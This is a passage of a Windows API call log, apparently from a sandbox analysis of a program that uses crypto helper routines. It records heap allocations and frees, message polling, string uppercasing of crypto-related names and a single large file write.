Size=0x4) returned 0x2e54d58 [0181.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0181.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0181.061] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0181.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0181.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0181.062] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0181.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0181.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0181.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0181.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0181.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0181.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0181.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0181.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0181.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0181.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0181.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x11b6020 [0181.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0181.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0181.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x135d020 [0181.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0181.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0181.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11b6020 | out: hHeap=0x970000) returned 1 [0181.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0181.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0181.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0181.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0181.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0181.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x11b2020 [0181.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x135d020 | out: hHeap=0x970000) returned 1 [0181.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0181.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0181.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0x135e020 [0181.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x11b2020 | out: hHeap=0x970000) returned 1 [0181.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0181.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0181.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0181.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x10dd020 | out: hHeap=0x970000) returned 1 [0181.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0181.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1006020 | out: hHeap=0x970000) returned 1 [0181.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0181.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0181.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0181.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0181.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1280020 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf33020 | out: hHeap=0x970000) returned 1 [0181.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0181.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0181.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0181.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0181.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0181.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0181.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0181.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0181.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0xe55020 [0181.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x135e020 | out: hHeap=0x970000) returned 1 [0181.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0181.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0181.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0181.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0181.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0181.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0181.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0xf27020 [0181.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0181.514] WriteFile (in: hFile=0x2a0, lpBuffer=0xf27020*, nNumberOfBytesToWrite=0xc4068, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf27020*, lpNumberOfBytesWritten=0x8cf5e4*=0xc4068, lpOverlapped=0x0) returned 1 [0181.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf27020 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0181.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0181.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0181.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0181.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0181.535] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0181.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0181.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0181.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0181.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0181.535] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0181.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0181.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.536] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0181.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0181.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0181.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0181.596] 